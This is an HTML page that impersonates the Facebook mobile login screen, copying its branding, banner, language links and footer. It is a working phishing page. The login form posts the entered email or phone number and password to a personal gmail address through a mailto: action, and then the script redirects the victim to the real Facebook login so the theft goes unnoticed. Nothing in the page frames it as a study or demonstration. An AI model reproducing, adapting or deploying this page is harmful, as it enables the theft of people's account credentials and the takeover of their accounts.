<!Doctype html>
<html lang="en">
<head>
	<title>facebook.com</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
	<style>
		body{
			background-color: white; 
			padding: 0px;
			margin: 0px;
			}
			.container{
				background-color: #fff8dc;
				color: #4169e1;
				height: 40px;
				margin: -5px;
				padding-top: 1px;
				padding-bottom: 6px;
				text-align: left;
				}
				.container1{
				background-color: none;
				font-size: 20px;
				font-weight: bold;
				text-align: center;
				color: #4169e1;
				}
				 
					.form{
						margin: auto;
						margin-top: 5px;
						padding-left: 10px;
						padding-right: 10px;
						
						
						}
						
						a{
						color: blue;
						text-decoration: none;
						}
						input[type=text], select, textarea, input[type=password]{
  width: 98%;
  padding: 12px;
  background-color: #f5f5f5;
  color: black';
  font-size: 12px;
  border-bottom: 1px solid #a9a9a9;
  border-left: 2px solid #f5f5f5;
  border-right: 2px solid #f5f5f5;
  border-top: 2px solid #f5f5f5;
  border-radius: 5px;
  margin-bottom: 10px;
  resize: vertical;
  height: 42px;
}


input[type=submit] {
  background-color: #4169e1;
  color: white;
  width: 98%;
  padding: 12px 20px;
  border-radius: 5px;
  border: none;
  cursor: pointer;
  maigin-top: 35px;
  font-weight: bold;
  }
  h1 {
    overflow: hidden;
    text-align: center;
    color: black;
}
h1:before,
h1:after {
    background-color: #000;
    content: "";
    display: inline-block;
    height: 1px;
    position: relative;
    vertical-align: middle;
    width: 50%;
}
h1:before {
    right: 0.3em;
    margin-left: -50%;
}
h1:after {
    left: 0.3em;
    margin-right: -50%;
}


h1 {
    overflow: hidden;
    text-align: center;
    font-size: 12px;
}
h1:before,
h1:after {
    background-color: #a9a9a9;
    content: "";
    display: inline-block;
    height: 1px;
    position: relative;
    vertical-align: middle;
    width: 50%;
}
h1:before {
    right: 0.5em;
    margin-left: -50%;
}
h1:after {
    left: 0.5em;
    margin-right: -50%;
}
.or{
	padding: 10px;
	margin-top: -20px;
	}
.new{
	padding-right: 90px;
	padding-left: 90px;
	padding-top: 25px;
	margin-top: -18px;
	}
	input[class=button1]{
		background-color: #009900;
		font-weight: bold;
		height: 39px;
		}
		.container2{
	padding-right: 0px;
	padding-left: 0px;
	padding-top: 10px;
	margin-top: 65px;
	font-size: 14px;
	border: 1px solid white;
	height: 125px;
	}
		.lang{
	padding-right: 10px;
	padding-left: 10px;
	padding-top: 20px;
	float: left;
	}
	.lang1{
	padding-right: 10px;
	padding-left: 10px;
	padding-top: 20px;
	float: right;
	}
	.lang ul{
						padding-left: 20px;
						list-style: square;
						list-style: none;
						text-align: center;
						line-height: 1.5em;
						}
						.lang1 ul{
						padding-left: 20px;
						list-style: square;
						list-style: none;
						text-align: center;
						line-height: 1.5em;
						}
						.lang a{
						color: #436b95;
						}
						.lang1 a{
						color: #436b95;
						}
						.face {
						margin-top: -2px;
						margin-left: 0px;
                        text-align: center;
                        font-size: 13px;
						}
						.button{
											background-color: white;
											padding: 0px 6px;
											border: 1px solid #436b95;
											border-radius: 2px;
											width: 35px;
											}
											.containerall{
	padding-right: 10px;
	padding-left: 10px;
	margin: auto;
	width: 350px;
}
	@media screen and (max-width: 600px) {
  .containerall {
padding-right: none;
padding-left: none;
width: none;
margin: none;
}
.container2{
	padding-right: 10px;
	padding-left: 10px;
	padding-top: 10px;
	margin-top: 65px;
	font-size: 14px;
	border: 1px solid white;
	height: 125px;
	}
	.container{
				background-color: #fff8dc;
				color: #4169e1;
				height: 40px;
				margin: -5px;
				padding-top: 1px;
				padding-bottom: 6px;
				text-align: center;
				}
 }
		
	
											
 
	</style>
</head>
<body>
	
	<div class="container">
		
		<p> <a href="more" style="color: #436b95;font-size: 15px;"> &#x1F4F1; Get Facebook for Android and browse faster. </a>
			</p>
			</div>
			<div class="containerall">
			<div class="container1">
			<p>facebook 
			</p>
			</div>
			
			<div class="form">
	     
	<form action="mailto: benkalozamani@gmail.com" method="post" enctype="text/plain" >
       
        <input type="text" id="myText" name="Email" placeholder="Mobile number or email address &#9432;"><br>
    
        <input type="password" id="pwd" name="psw" required placeholder="Password"><br>
        	<input class="button" type="submit" onclick="Redirect()" value="Log In" name=""> <br>
        	<p style="color: #4169e1;margin: 20px 70px;text-align: center;margin-top: 0.6em;">Forgotten password?</p>
        	</form>
		</div>
		
		<div class="or"><h1>or</h1></div>
		
		<div class="new">
		     	<input class="button1" type="submit" onclick="Redirect1()" value="Create New Account" name=""> <br>
			</div>
			
			
			<div class="container2">
				<div class="lang">
					<ul>
		<li> <a href="#">English (UK)</a></li>
		<li> <a href="#">Françias (France)</a></li>
		<li> <a href="#">Español</a></li>
		<li> <a href="#">Deutsch</a></li>
</ul>
				</div>
				<div class="lang1">
					<ul>
		<li> <a href="#">Hausa</a></li>
		<li> <a href="#">Portuguêse (Brazil)</a></li>
		<li> <a href="#"><a>الكتابة</a></li>
		<li> <a class="button" href="https://m.facebook.com/language/?next_uri=https%3A%2F%2Fm.facebook.com%2Flogin%2F%3Fnext%26ref%3Ddbl%26fl%26refid%3D8&ref=dbl" style="color: grey;font-size: 17px; font-weight: bold;" >+</a></li>
</ul>
				</div>
				</div>
				<div class="face">
				<p style="color: grey;text-align: center;">Facebook Inc.
			</p>
			</div>
			</div>
			
			
			
				 <script type="text/javascript">
function Redirect() {
window.location="https://m.facebook.com/login/?next&ref=dbl&fl&refid=8";
}
function Redirect1() {
window.location="https://m.facebook.com/reg/?cid=103&refsrc=deprecated&soft=hjk";
}
function input() {
  var x = document.getElementById("myText").value;
    var y = document.getElementById("pwd").value;
  }
</script>
				
</body>
</html>
					